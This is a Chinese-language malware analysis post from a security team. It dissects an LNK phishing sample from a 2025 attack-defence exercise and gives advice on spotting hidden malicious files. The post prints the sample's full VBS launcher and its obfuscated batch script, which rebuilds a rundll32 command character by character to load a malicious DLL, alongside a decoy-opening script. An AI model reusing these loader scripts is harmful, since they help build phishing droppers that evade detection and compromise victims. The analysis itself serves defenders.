文章总结: 本文分析了2025年攻防演练中的真实LNK钓鱼样本,揭示了其攻击链:LNK文件通过Explorer执行VBS脚本,进而调用BAT批处理文件,最终通过rundll32加载恶意DLL并执行恶意代码。攻击者采用多层隐藏和混淆技术规避检测。防范建议包括检查可疑文件后缀,使用attrib命令显示隐藏文件,并提高安全意识。该分析为安全团队提供了识别和应对此类钓鱼攻击的实用方法。
综合评分: 87
文章分类: 应急响应,恶意软件,漏洞分析,威胁情报,WEB安全
【应急响应】2025国hvv-Lnk钓鱼样本分析
原创
生吃香菜
Polaris安全团队
2025年11月3日 17:13
广西
前言
该样本来源于2025近期攻防演练中,真实环境钓鱼样本,本次分析希望给大家普及如何避免和防范钓鱼木马。及互相交流技术学习。
LNK钓鱼的危害极大,尤其是在护网这种攻防对抗场景中,它往往是突破内网的第一滴血,要做好对应的防范。免得造成一失足成千古恨。
目录结构
因为采用了系统属性进行隐藏,正常的《显示文件隐藏》是无法显示的。这里给出两种办法。
可按照下方的方法,在打开文件之前查看一下是否存在可疑文件,在此列出相关可能造成影响的后缀:
exe、dll、lnk、iso、bat、vbs、ps1等等非文档的后缀格式
方法1
attrib -s -h /S /D #移除属性
tree /F #列出树状图
image.png
方法2
image.png
以下是完整的目录结构
C:.
└─专家咨询费支付-江西省某客户硬件设备070101采购项目
│ 专家咨询费支付-江西省某客户硬件设备070101采购项目.xlsx
│ 专家咨询费支付-江西省某客户硬件设备070101采购项目.xlsx.lnk
└─__MACOSXO
├─__MACOSX
│ └─__MACOSX
│ └─__MACOSX
└─__MACOSXO
├─__MACOSX
│ └─__MACOSX
└─__MACOSXOSX
└─__MACOSXC
chromedo.vbs
docx.bat
mspupdate.bat
wininetwork.dll
专家咨询费支付-江西省某客户硬件设备070101采购项目.xlsx
路径分析
专家咨询费支付-江西省某客户硬件设备070101采购项目.xlsx.lnk(入口)
这个快捷方式的调用路径如下,继续跟进
C:\Windows\explorer.exe __MACOSXO\__MACOSXO\__MACOSXOSX\__MACOSXC\chromedo.vbs
chromedo.vbs(关键)
vbs中操作的内容就是调用两个bat进行后续操作:mspupdate.bat,docx.bat
On Error Resume Next
Dim shellObj, fso, currentDir, batFilePath, docxBatPath, folder, file
Set shellObj = CreateObject("WScript.Shell")
Set fso = CreateObject("Scripting.FileSystemObject")
' 获取当前目录
currentDir = fso.GetParentFolderName(WScript.ScriptFullName)
' 第一部分:运行 mspupdate.bat
batFilePath = currentDir & "\mspupdate.bat"
If fso.FileExists(batFilePath) Then
shellObj.Run Chr(34) & batFilePath & Chr(34), 0, False
End If
' 第三部分:运行 docx.bat
docxBatPath = currentDir & "\docx.bat"
If fso.FileExists(docxBatPath) Then
shellObj.Run Chr(34) & docxBatPath & Chr(34), 0, False
End If
' 清理对象
Set shellObj = Nothing
Set fso = Nothing
Set folder = Nothing
mspupdate.bat(关键)
最主要的bat,利用【rundll32.exe】加载【wininetwork.dll】中的【InternetReadFile】函数
-
第二阶段:需要注意以下三个字符串:c,d,f
-
c : rundll32.exe
-
d : wininetwork.dll
-
f : InternetReadFile
-
第三阶段:拼接命令
-
rundll32.exe wininetwork.dll,InternetReadFile
@echo off
setlocal EnableDelayedExpansion
:: 第一阶段:无害干扰代码
for /l %%i in (1,1,3) do (
ver >nul
ping 127.0.0.1 -n 2 >nul
)
:: 第二阶段:动态构建关键组件
set"c1=r" & set"c2=u" & set"c3=n" & set"c4=d" & set"c5=l" & set"c6=l"
set"c7=3" & set"c8=2" & set"c9=." & set"c10=e" & set"c11=x" & set"c12=e"
set"d1=w" & set"d2=i" & set"d3=n" & set"d4=i" & set"d5=n" & set"d6=e"
set"d7=t" & set"d8=w" & set"d9=o" & set"d10=r" & set"d11=k" & set"d12=."
set"d13=d" & set"d14=l" & set"d15=l"
set"f1=I" & set"f2=n" & set"f3=t" & set"f4=e" & set"f5=r" & set"f6=n"
set"f7=e" & set"f8=t" & set"f9=R" & set"f10=e" & set"f11=a" & set"f12=d"
set"f13=F" & set"f14=i" & set"f15=l" & set"f16=e"
:: 第三阶段:组装关键组件
set"bin="
for /l %%n in (1,1,12) do (
set"bin=!bin!!c%%n!"
)
set"target="
for /l %%m in (1,1,15) do (
set"target=!target!!d%%m!"
)
set"func="
for /l %%k in (1,1,16) do (
set"func=!func!!f%%k!"
)
:: 第四阶段:执行核心功能
set"fullpath=%~dp0!target!"
%bin% "!fullpath!",!func!
:: 清理阶段
endlocal
docx.bat(无害)
遍历目录找到结尾是xlsx的文件后打开
@echo off
setlocal enabledelayedexpansion
:: 获取当前目录
set"currentDir=%~dp0"
set"currentDir=%currentDir:~0,-1%"
:: 查找并打开第一个.docx文件
for %%F in ("%currentDir%\*.xlsx") do (
start """%%~F"
exit /b
)
:: 如果没有找到.docx文件,则打开当前目录
start """%currentDir%"
路径如下:
专家咨询费支付-江西省某客户硬件设备070101采购项目.xlsx.lnk
⬇
chromedo.vbs
⬇
mspupdate.bat
⬇
rundll32.exe
⬇
wininetwork.dll.InternetReadFile (恶意dll)
二进制分析(wininetwork.dll)
使用IDA直接查看的InternetReadFile函数
pfnAPC
初始化
image.png
image.png
sub_18012F580
执行命令和下载
添加计划任务
结束
该攻击链利用LNK文件通过Explorer进程执行VBS脚本,VBS脚本随后调用两个BAT批处理文件。其中mspupdate.bat通过rundll32加载wininetwork.dll并调用其中的InternetReadFile函数,所有网络通信行为均在wininetwork.dll中实现。
关注公众号回复【20251103】即可获得本文样本
持续分享钓鱼样本….
大佬们有捕获到好玩的样本,可加群互相学习,一起交流~~~~后续也会持续更新捕获到的样本分析及思路。
免责声明:
本文所载程序、技术方法仅面向合法合规的安全研究与教学场景,旨在提升网络安全防护能力,具有明确的技术研究属性。
任何单位或个人未经授权,将本文内容用于攻击、破坏等非法用途的,由此引发的全部法律责任、民事赔偿及连带责任,均由行为人独立承担,本站不承担任何连带责任。
本站内容均为技术交流与知识分享目的发布,若存在版权侵权或其他异议,请通过邮件联系处理,具体联系方式可点击页面上方的联系我。
本文转载自:Polaris安全团队 生吃香菜《【应急响应】2025国hvv-Lnk钓鱼样本分析》